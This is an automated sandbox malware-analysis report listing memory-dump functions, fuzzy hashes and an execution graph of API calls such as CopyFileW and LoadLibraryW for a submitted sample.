                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a5ec341e22caf2194400945bbb1602b2a331acbe0bc00ebf449ae127ca3ac5e9
                        • Instruction ID: 5a3aebc1908f6ee17926925b618041beb8097879a72772d383908d4249e486b5
                        • Opcode Fuzzy Hash: a5ec341e22caf2194400945bbb1602b2a331acbe0bc00ebf449ae127ca3ac5e9
                        • Instruction Fuzzy Hash: E6F18CB17013158FEB25DBB9C450BEEBBF6AF8A300F14446AD1469B790DB34E981CB61
                        Function 076B4D38 Relevance: .3, Instructions: 312COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b6002e867b60cde5eeaffcf18e2d3177e087933de8a6a5de6408d57285ae1d79
                        • Instruction ID: ba57b79c599b985929b036a45fabff5423c2a8b178cabc407b1362c52014a0ce
                        • Opcode Fuzzy Hash: b6002e867b60cde5eeaffcf18e2d3177e087933de8a6a5de6408d57285ae1d79
                        • Instruction Fuzzy Hash: 2DE1D9B4E042598FDB14DFA9D5809AEFBB2FF89304F248159D815AB356D730AD82CF60
                        Function 076B44C8 Relevance: .3, Instructions: 312COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 06e07d42660a0b6af30cac5735da702c61874e485cf8a01dc883b99a5f1039a3
                        • Instruction ID: f32e7ca15e87e74f6a7fff07a61c088a371264747517770b8e141eb38cf22124
                        • Opcode Fuzzy Hash: 06e07d42660a0b6af30cac5735da702c61874e485cf8a01dc883b99a5f1039a3
                        • Instruction Fuzzy Hash: B7E1ECB4E041598FDB14DFA9C5809AEFBB2FF89304F248169D815A7356DB30AD82CF60
                        Function 076B5170 Relevance: .3, Instructions: 312COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 144d79673c9162b0b5e2e32fd7fb801148367f5a674aa6cfd1771a30e7f7c447
                        • Instruction ID: d5cd0c483fefbcee437fc95c4f2b6693557ab18a43118f7925861930b7bb15b5
                        • Opcode Fuzzy Hash: 144d79673c9162b0b5e2e32fd7fb801148367f5a674aa6cfd1771a30e7f7c447
                        • Instruction Fuzzy Hash: AFE1F9B4E042198FDB14DFA9C5809EEBBB2FF89305F248159D815AB356D730AD82CF60
                        Function 076B4900 Relevance: .3, Instructions: 312COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3aabff8c3975354030bdba72d1e09e0dc94564cc2ab0d7c337fd9dffe35cdfcc
                        • Instruction ID: 8421993133b901b5478cf62c86cae028d3e8e0e2365f394385bcdad23edbe762
                        • Opcode Fuzzy Hash: 3aabff8c3975354030bdba72d1e09e0dc94564cc2ab0d7c337fd9dffe35cdfcc
                        • Instruction Fuzzy Hash: B8E1EAB4E041598FDB14DFA9C5809AEFBB2FF89304F248159D815AB356DB31AD82CF60
                        Function 076B6878 Relevance: .3, Instructions: 312COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9b0dfc3320f52a3c84d0b3122ced3cb394d88b7fa97208833b40b4c82009fbbd
                        • Instruction ID: bdf607d05c34f7b21320d360a9e497ff9dee07d6330ada53d2a447a45457788b
                        • Opcode Fuzzy Hash: 9b0dfc3320f52a3c84d0b3122ced3cb394d88b7fa97208833b40b4c82009fbbd
                        • Instruction Fuzzy Hash: 06E1D8B4E042198FDB14DFA9C5909AEBBB2FF89304F24C169D815AB355D730AD82CF60
                        Function 076B44A7 Relevance: .1, Instructions: 141COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f6650c5c461f1195dea652f860d6b8440b065706a4ccfa393ed51defe1e55a1e
                        • Instruction ID: e26b263ef3adc75a88c5760cd2ffbeb847ce988d94ae55528b353cdbb6bef791
                        • Opcode Fuzzy Hash: f6650c5c461f1195dea652f860d6b8440b065706a4ccfa393ed51defe1e55a1e
                        • Instruction Fuzzy Hash: FE513BB4E002198BDB14CFA9C9805AEFBF6FF89300F24C169D418A7356D7309982CFA0
                        Function 076B6867 Relevance: .1, Instructions: 138COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8c1513f6d5f6871127ba50d7fc72c785efc43c055e16f7d628095c1c0dda240c
                        • Instruction ID: a61865331c9c8c40f39d2fda65856adaa2a015830cf6378435149d46c680cfde
                        • Opcode Fuzzy Hash: 8c1513f6d5f6871127ba50d7fc72c785efc43c055e16f7d628095c1c0dda240c
                        • Instruction Fuzzy Hash: 49511AB4E042198FDB14DFA9C9805AEFBB2EF89304F24C16AD419A7355D7309D82CFA1
                        Function 076B48F1 Relevance: .1, Instructions: 130COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 369175421b1052f553ed9102036e9b3b0c4a13300947431a8ccfe04414fb1b57
                        • Instruction ID: 655e1e12763a9ca840bfbc1cd4223c3c798eca93e81488f786f6067119bf9ffd
                        • Opcode Fuzzy Hash: 369175421b1052f553ed9102036e9b3b0c4a13300947431a8ccfe04414fb1b57
                        • Instruction Fuzzy Hash: 6C511AB4E002598BDB14DFA9C5805AEFBB2FF89304F24C169D419A7356DB319D82CFA1

                        Execution Graph

                        Execution Coverage:15%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:99
                        Total number of Limit Nodes:8
                        execution_graph 28268 17d0848 28269 17d0849 28268->28269 28272 17d1251 28269->28272 28273 17d1258 28272->28273 28274 17d145c 28273->28274 28276 6ade8e8 28273->28276 28277 6ade8ff 28276->28277 28278 6ade90b 28276->28278 28284 6ade928 28277->28284 28294 6adee60 28277->28294 28304 6adec94 28277->28304 28314 6adec8b 28277->28314 28324 6ade918 28277->28324 28278->28274 28286 6ade94d 28284->28286 28285 6adee84 28285->28285 28286->28285 28287 6adeed8 CopyFileW 28286->28287 28288 6adf19a CopyFileW 28286->28288 28289 6adf0e5 CopyFileW 28286->28289 28290 6adf156 CopyFileW 28286->28290 28291 6adf14d CopyFileW 28286->28291 28292 6adeec8 CopyFileW 28286->28292 28334 6adf276 28286->28334 28287->28286 28288->28286 28289->28286 28290->28286 28291->28286 28292->28286 28296 6ade97b 28294->28296 28295 6adee84 28295->28295 28296->28295 28297 6adf14d CopyFileW 28296->28297 28298 6adeec8 CopyFileW 28296->28298 28299 6adeed8 CopyFileW 28296->28299 28300 6adf19a CopyFileW 28296->28300 28301 6adf0e5 CopyFileW 28296->28301 28302 6adf156 CopyFileW 28296->28302 28303 6adf276 CopyFileW 28296->28303 28297->28296 28298->28296 28299->28296 28300->28296 28301->28296 28302->28296 28303->28296 28306 6ade97b 28304->28306 28305 6adee84 28305->28305 28306->28305 28307 6adf14d CopyFileW 28306->28307 28308 6adeec8 CopyFileW 28306->28308 28309 6adeed8 CopyFileW 28306->28309 28310 6adf19a CopyFileW 28306->28310 28311 6adf0e5 CopyFileW 28306->28311 28312 6adf156 CopyFileW 28306->28312 28313 6adf276 CopyFileW 28306->28313 28307->28306 28308->28306 28309->28306 28310->28306 28311->28306 28312->28306 28313->28306 28316 6ade97b 28314->28316 28315 6adee84 28315->28315 28316->28314 28316->28315 28317 6adf14d CopyFileW 28316->28317 28318 6adf276 CopyFileW 28316->28318 28319 6adeec8 CopyFileW 28316->28319 28320 6adeed8 CopyFileW 28316->28320 28321 6adf19a CopyFileW 28316->28321 28322 6adf0e5 CopyFileW 28316->28322 28323 6adf156 CopyFileW 28316->28323 28317->28316 28318->28316 28319->28316 28320->28316 28321->28316 28322->28316 28323->28316 28326 6ade928 28324->28326 28325 6adee84 28325->28325 28326->28325 28327 6adeed8 CopyFileW 28326->28327 28328 6adf19a CopyFileW 28326->28328 28329 6adf0e5 CopyFileW 28326->28329 28330 6adf156 CopyFileW 28326->28330 28331 6adf14d CopyFileW 28326->28331 28332 6adeec8 CopyFileW 28326->28332 28333 6adf276 CopyFileW 28326->28333 28327->28326 28328->28326 28329->28326 28330->28326 28331->28326 28332->28326 28333->28326 28335 6adf243 28334->28335 28335->28334 28339 6adf320 28335->28339 28342 6adf310 28335->28342 28347 6adc36c 28339->28347 28343 6adf2c8 28342->28343 28344 6adf313 28342->28344 28343->28286 28345 6adc36c CopyFileW 28344->28345 28346 6adf33c 28345->28346 28349 6adf360 CopyFileW 28347->28349 28350 6adf33c 28349->28350 28227 17d0871 28228 17d087c 28227->28228 28232 17d08d8 28228->28232 28237 17d08c8 28228->28237 28229 17d0889 28233 17d08d9 28232->28233 28242 17d0ce8 28233->28242 28246 17d0ce0 28233->28246 28234 17d093e 28234->28229 28238 17d08d0 28237->28238 28240 17d0ce8 GetConsoleWindow 28238->28240 28241 17d0ce0 GetConsoleWindow 28238->28241 28239 17d093e 28239->28229 28240->28239 28241->28239 28243 17d0ce9 GetConsoleWindow 28242->28243 28245 17d0d56 28243->28245 28245->28234 28247 17d0ce4 GetConsoleWindow 28246->28247 28249 17d0d56 28247->28249 28249->28234 28250 6ad6361 28251 6ad62fc 28250->28251 28252 6ad636a 28250->28252 28256 6ad73f1 28251->28256 28260 6ad7400 28251->28260 28253 6ad631d 28257 6ad7448 28256->28257 28259 6ad7451 28257->28259 28264 6ad6f98 28257->28264 28259->28253 28261 6ad7448 28260->28261 28262 6ad7451 28261->28262 28263 6ad6f98 LoadLibraryW 28261->28263 28262->28253 28263->28262 28265 6ad75f0 LoadLibraryW 28264->28265 28267 6ad7665 28265->28267 28267->28259

                        Executed Functions

                        Function 06ADC36C Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                        Download Yara Rule
                        APIs
                        • CopyFileW.KERNELBASE(?,00000000,?), ref: 06ADF3F9
                        Memory Dump Source
                        • Source File: 00000009.00000002.2225079622.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_6ad0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: CopyFile
                        • String ID:
                        • API String ID: 1304948518-0
                        • Opcode ID: f48fa610bb1da94866e99de1c79aec8a74b0149a2a48ef373c194bfe65a33997
                        • Instruction ID: b1fbceaa475a67f457167682e9eaaf1e5d08aa93f645cf62b81e98044503322d
                        • Opcode Fuzzy Hash: f48fa610bb1da94866e99de1c79aec8a74b0149a2a48ef373c194bfe65a33997
                        • Instruction Fuzzy Hash: B7315CB1C012199FCB50CF9AD4847EEFBF4EF48320F15816AE919AB345D3349940CBA4
                        Function 06ADF35A Relevance: 1.6, APIs: 1, Instructions: 74fileCOMMON
                        Download Yara Rule
                        APIs
                        • CopyFileW.KERNELBASE(?,00000000,?), ref: 06ADF3F9
                        Memory Dump Source
                        • Source File: 00000009.00000002.2225079622.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_6ad0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: CopyFile
                        • String ID:
                        • API String ID: 1304948518-0
                        • Opcode ID: 6b1ae46be1594ed81ffc8297451b8d52b542e4de990192311a359c48dd799fe0
                        • Instruction ID: 43b5d9c6adae9240a15aa5b6120d0208d3559071acf0911d66ad81c654259611
                        • Opcode Fuzzy Hash: 6b1ae46be1594ed81ffc8297451b8d52b542e4de990192311a359c48dd799fe0
                        • Instruction Fuzzy Hash: 89214BB2C012199FCB50CFAAD5847DEFBF5EF48320F15816AE819AB345D3759A40CBA0
                        Function 017D0CE0 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                        Download Yara Rule
                        APIs
                        • GetConsoleWindow.KERNELBASE ref: 017D0D47
                        Memory Dump Source
                        • Source File: 00000009.00000002.2207567972.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_17d0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: ConsoleWindow
                        • String ID:
                        • API String ID: 2863861424-0
                        • Opcode ID: 3cb4dd575af04381a900caa37d7144c4f67ede2ecb421f6791e6cac7722d3ee6
                        • Instruction ID: 109394e0171e535947e90854ccc16ce584585b78f52637d5bdcea38607d785ec
                        • Opcode Fuzzy Hash: 3cb4dd575af04381a900caa37d7144c4f67ede2ecb421f6791e6cac7722d3ee6
                        • Instruction Fuzzy Hash: 811149B1D003498FDB24DFAAC8457EEFFF4EF88324F24845AD519A7250C675A944CB90
                        Function 06AD6F98 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,06AD74A6), ref: 06AD7656
                        Memory Dump Source
                        • Source File: 00000009.00000002.2225079622.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_6ad0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 08482d0d607496c7e568392029a76549230b858bce9b04b52ff2d7730372dbc3
                        • Instruction ID: eca1f90396de9e1359aaf19e1a08c547624bd149dd01e0642dc110a001ea8c2b
                        • Opcode Fuzzy Hash: 08482d0d607496c7e568392029a76549230b858bce9b04b52ff2d7730372dbc3
                        • Instruction Fuzzy Hash: 621112B1C002498FCB24DF9AC848A9EFBF4EF88220F14845AD42AA7200D775A545CFA5
                        Function 06AD75E8 Relevance: 1.6, APIs: 1, Instructions: 50libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,06AD74A6), ref: 06AD7656
                        Memory Dump Source
                        • Source File: 00000009.00000002.2225079622.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_6ad0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 51cb2be7d19960b51ed19a796977eb9db41a628d4f1006d6b9e4d62191fdfb89
                        • Instruction ID: fa1463a080f031945e45bb1ea61cb743111fc7281063cd8bdc3e1f8211203c26
                        • Opcode Fuzzy Hash: 51cb2be7d19960b51ed19a796977eb9db41a628d4f1006d6b9e4d62191fdfb89
                        • Instruction Fuzzy Hash: 651112B5C002498FDB14DF9AC944ADEFBF4AF88210F24885AD46AB7610D374A546CFA0
                        Function 017D0CE8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                        Download Yara Rule
                        APIs
                        • GetConsoleWindow.KERNELBASE ref: 017D0D47
                        Memory Dump Source
                        • Source File: 00000009.00000002.2207567972.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_17d0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: ConsoleWindow
                        • String ID:
                        • API String ID: 2863861424-0
                        • Opcode ID: 4794ffe352357e73f2d1b25b63e2a2d60bb57306adcef3f5062175a3ea501495
                        • Instruction ID: dc581e6eb7134f0932afe62d99488f3046041a4aa0673f1c5e991b5b9dbe32dc
                        • Opcode Fuzzy Hash: 4794ffe352357e73f2d1b25b63e2a2d60bb57306adcef3f5062175a3ea501495
                        • Instruction Fuzzy Hash: 1711F5B1D002498FDB24DFAAC44979EFFF5AB48324F24845AD519A7240C679A544CBA1
                        Function 06B2349D Relevance: 1.3, Instructions: 1281COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.2225170930.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_6b20000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: db04c858ac78bcede65f2c8dc53bdda33d5c7f2fc77694dfc6d00a65308527fb
                        • Instruction ID: ba647ba2bf2c9632f00212b1c4354bbbc94cba0b47936e21a30835f003ae32dc
                        • Opcode Fuzzy Hash: db04c858ac78bcede65f2c8dc53bdda33d5c7f2fc77694dfc6d00a65308527fb
                        • Instruction Fuzzy Hash: C8A1B274B042559FCB45DB68C894E6EBBF2FF89600B1484AAE51ACB3A1CB35DC01CB61
                        Function 06B21759 Relevance: 1.2, Instructions: 1248COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.2225170930.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_6b20000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ce1a378b93044bad06e5a0704be7b22d9b6ceb10cfcf3ae6a1d2e787ba94bf37
                        • Instruction ID: e32e34c837a8c14dea1b4a91e4fe70f206906db3035ad20f0a47e1c35e44f651
                        • Opcode Fuzzy Hash: ce1a378b93044bad06e5a0704be7b22d9b6ceb10cfcf3ae6a1d2e787ba94bf37
                        • Instruction Fuzzy Hash: 40B23E74B402199FCB54DF68C891AADBBB2FF88700F1080D9E659AB361DB719E41CF91
                        Function 06B20048 Relevance: .7, Instructions: 665COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.2225170930.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_6b20000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5f45395f81af2638cdb31e699ac61295d8a177256986b916784bbc6bbfb3d54a
                        • Instruction ID: a650a3164b14720bad901c4f2fd0779e8aa49ce5d376f2c254e9cab890279fd5
                        • Opcode Fuzzy Hash: 5f45395f81af2638cdb31e699ac61295d8a177256986b916784bbc6bbfb3d54a
                        • Instruction Fuzzy Hash: EB4266B07406258FCB29EF68D49066EBBB2FFC5710F009A5CD5069B391CF76AD058B86
                        Function 06B20000 Relevance: .4, Instructions: 351COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.2225170930.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_6b20000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 48c9163453c2190c09303ca6f3a7425d13715ea7e0cd5c8835a63ee49ab1cade
                        • Instruction ID: ab6ae421d844cec09d0cd2f0db04ca705265ddbf661c8d75fd5692c858089f79
                        • Opcode Fuzzy Hash: 48c9163453c2190c09303ca6f3a7425d13715ea7e0cd5c8835a63ee49ab1cade
                        • Instruction Fuzzy Hash: A3D1BFB0B042559FDB41EF68C845A6EBBF2FF85700F14809AE5068F3A2CB719C45CB92
                        Function 06B211A8 Relevance: .2, Instructions: 200COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.2225170930.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_6b20000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f025b439747178f3fc887a7d5d2cd598c7d1ea8ae8682f0041af0d22b3051648
                        • Instruction ID: c1b30109c33bc05677b11e4b0bec5c1775be65238876840a825ea96acd753182
                        • Opcode Fuzzy Hash: f025b439747178f3fc887a7d5d2cd598c7d1ea8ae8682f0041af0d22b3051648
                        • Instruction Fuzzy Hash: 115108B2B142669FCB549E6DC84056AF7E6FFC6211B1481BAEA09C7211EF31C845C7A1
                        Function 06B23258 Relevance: .1, Instructions: 143COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.2225170930.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_6b20000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8828765685c4e700ebb11e2711cd67d0a1e7084602f8dcc221534ff1c35138fb
                        • Instruction ID: 5629f1be3cd3460aace524501e602147f20f49d4b0310ccf28a30dd70be4cebb
                        • Opcode Fuzzy Hash: 8828765685c4e700ebb11e2711cd67d0a1e7084602f8dcc221534ff1c35138fb
                        • Instruction Fuzzy Hash: 84512075B102199FCB54DF69C89499EBBF2FF88710B1580A9E909EB361DB30ED05CB50
                        Function 0177D054 Relevance: .1, Instructions: 77COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.2207085557.000000000177D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0177D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_177d000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c07808b8becefc5bf50830e4aad7ac51e59164e456044fc1f3bc0b604d1cc346
                        • Instruction ID: 3e0565ade6e2e2444dea705da666c5585708dfcc464d3adb5d396747201db9a8
                        • Opcode Fuzzy Hash: c07808b8becefc5bf50830e4aad7ac51e59164e456044fc1f3bc0b604d1cc346
                        • Instruction Fuzzy Hash: 6A21C7B2504244DFDF26DF54D9C0B26FF65FF88314F24C5A9E9091A256C336D416CB61
                        Function 0178D474 Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.2207162787.000000000178D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0178D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_178d000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e433cadf669846955768b1264dbfad185cc705dd7424700715e411c4895619e4
                        • Instruction ID: 412a498124c23d58bbd0c54f5404cea240d30f04ce97eda8f40750e5e8e84b4a
                        • Opcode Fuzzy Hash: e433cadf669846955768b1264dbfad185cc705dd7424700715e411c4895619e4
                        • Instruction Fuzzy Hash: 8921F5B1544200EFDB25EF98C5C4B26FB65FB84318F34C9AED90D4B296C736D446CA62
                        Function 0178D2C4 Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.2207162787.000000000178D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0178D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_178d000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2a38855422ecd7b3c149dfaa9f3d1a83611e59e2088b5f65d18d4b80499d8626
                        • Instruction ID: 1044fd422c0e322b5233156ca8406ab23bf1316b2dd10398dd886a62a3404f53
                        • Opcode Fuzzy Hash: 2a38855422ecd7b3c149dfaa9f3d1a83611e59e2088b5f65d18d4b80499d8626
                        • Instruction Fuzzy Hash: 9D215BB1544204EFDB25EF58D9C0B2AFF65FB84324F24C56DE8494B686C33AD446CAB1
                        Function 0177D04F Relevance: .1, Instructions: 58COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.2207085557.000000000177D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0177D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_177d000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ad2dec59e3151889acede25dbdc09f1e0996748c90a37620c8196c664727292b
                        • Instruction ID: 821bbc68116d35188f2d6c2d579b7736993880c2d1b5d577434b32af59d00d4a
                        • Opcode Fuzzy Hash: ad2dec59e3151889acede25dbdc09f1e0996748c90a37620c8196c664727292b
                        • Instruction Fuzzy Hash: 1321CD72504280DFCF16CF44E9C0B16BF72FF88314F2886A9D9480A656C33AD426CB91
                        Function 06B213F0 Relevance: .1, Instructions: 56COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.2225170930.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_6b20000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cafd8deb662fab6c047b3ef731b57fa6a0866c4326863cba20ed3f63ddbd0da3
                        • Instruction ID: b9ace11a4b0f83848b580f748c1e5d0e9ea8aeda6b2f8ad1d91ec0b975c047ba
                        • Opcode Fuzzy Hash: cafd8deb662fab6c047b3ef731b57fa6a0866c4326863cba20ed3f63ddbd0da3
                        • Instruction Fuzzy Hash: 980126767101728BCB54856E9400836B7EACBD522A318807BCA1EC3300EA32C842CA91
                        Function 0178D2BF Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.2207162787.000000000178D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0178D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_178d000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6571a979d86382cef3f3a0ee6dcd591210bcaba3c37dfea3d6794a8d99f67603
                        • Instruction ID: caa981f03669699bda1a9fc9cf477ace87b85b993f3b6453b713fe88e468c1bf
                        • Opcode Fuzzy Hash: 6571a979d86382cef3f3a0ee6dcd591210bcaba3c37dfea3d6794a8d99f67603
                        • Instruction Fuzzy Hash: C7110475544280CFDB12DF14D5C0B19FF72FB84324F24C6AAD8494BA86C33AD44ACBA1
                        Function 0178D46F Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.2207162787.000000000178D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0178D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_178d000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                        • Instruction ID: 69ba610e276bb21500b038b5efa80645272327fa79e81456a1adee78c8b89ec7
                        • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                        • Instruction Fuzzy Hash: 6411BB75544280CFDB12DF54C5C4B15FBA2FB88218F34C6AAD8494B696C33AD44ACB62
                        Function 06B213D4 Relevance: .0, Instructions: 39COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.2225170930.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
